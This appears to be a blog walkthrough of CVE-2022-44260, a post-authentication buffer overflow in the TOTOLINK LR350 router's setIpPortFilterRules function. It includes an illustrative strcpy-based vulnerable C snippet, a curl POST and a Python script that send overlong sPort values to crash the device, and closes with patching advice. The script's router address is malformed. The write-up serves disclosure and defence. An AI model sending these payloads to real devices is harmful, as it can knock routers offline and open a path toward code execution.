In late 2022, a critical vulnerability was discovered in the TOTOLINK LR350 router series—
specifically in firmware version V9.3.5u.6369_B20220309.
This security flaw, registered as CVE-2022-44260, allows a remote attacker (after logging in)
to achieve buffer overflow through the sPort or ePort parameter in the setIpPortFilterRules function.
This post gives you a simple, exclusive walkthrough of the vulnerability, including a code snippet, exploit details, and reference links.
What is a Buffer Overflow?
A *buffer overflow* happens when a program tries to store more data in a buffer (memory space)
than it can handle.
If this occurs, it can overwrite adjacent memory, resulting in crashes, information leaks, or,
worst of all, arbitrary code execution by an attacker.
Firmware: V9.3.5u.6369_B20220309
- Vulnerability: Buffer overflow via sPort or ePort parameters in the setIpPortFilterRules function
Vulnerability Details
The router offers a web management interface meant for network administrators.
Once authenticated, users can manage IP and port filter rules using setIpPortFilterRules.
The flaw resides in how the web handler processes the sPort and ePort parameters.
It does not properly check the input length, allowing overlong strings to overflow a fixed-length buffer in C.
Source Code Snippet (Vulnerable Function)
While the exact proprietary source is not public, a common C code pattern leading to this bug would look like:
int setIpPortFilterRules(request) {
char sPort[8];
char ePort[8];
// fetch user-supplied input
strcpy(sPort, request->sPort); // No length check!
strcpy(ePort, request->ePort); // No length check!
// ... rest of the logic ...
}
In practice, if a user POSTs a very long value for sPort or ePort, it will overflow the 8-byte buffer,
overwriting stack memory and potentially letting an attacker control program flow.
Log in to the Router:
- This is a *post-authentication* flaw, so you need valid admin/web credentials.
Send Malicious POST Request:
- Craft a POST request targeting the router's /cgi-bin/cstecgi.cgi endpoint.
Example *curl* payload (Python version at the end)
curl -X POST \
-d 'topic=ipPortFilter&event=setIpPortFilterRules' \
-d 'sPort=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
-b "SID=YOUR_SESSION_COOKIE" \
http://<ROUTER_IP>/cgi-bin/cstecgi.cgi
Replace YOUR_SESSION_COOKIE and <ROUTER_IP> accordingly.
If exploited successfully, this could crash the router—or worse, let the attacker run arbitrary code on it.
Here’s a minimal Python script to demonstrate the crash
import requests
ROUTER = "http://192.168..1";
COOKIE = "SID=YOUR_SESSION_COOKIE"
long_data = "A" * 500
data = {
"topic": "ipPortFilter",
"event": "setIpPortFilterRules",
"sPort": long_data,
"ePort": "1234", # or you can overflow both
}
headers = {
"Cookie": COOKIE,
}
resp = requests.post(f"{ROUTER}/cgi-bin/cstecgi.cgi", data=data, headers=headers)
print(resp.status_code)
Warning: Running this on your device may render it unresponsive.
Impact
- Confidentiality: Attackers can execute code and potentially retrieve sensitive config/data.
Recommendations: Fix & Mitigation
- Upgrade Firmware: Immediately update your router to the latest firmware from TOTOLINK’s Download page.
References
- CVE-2022-44260 (NVD)
- CVE DB on Exploit-DB
- TOTOLINK Official Site
- GitHub PoC
Final Thoughts
While CVE-2022-44260 is not pre-auth, it’s a dangerous bug if credentials get leaked,
or if an internal attacker is on your network.
Make sure to patch as soon as possible,
and never overlook these “post-auth” bugs—they’re frequently a step in bigger attacks!
Timeline
Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:44:00 UTC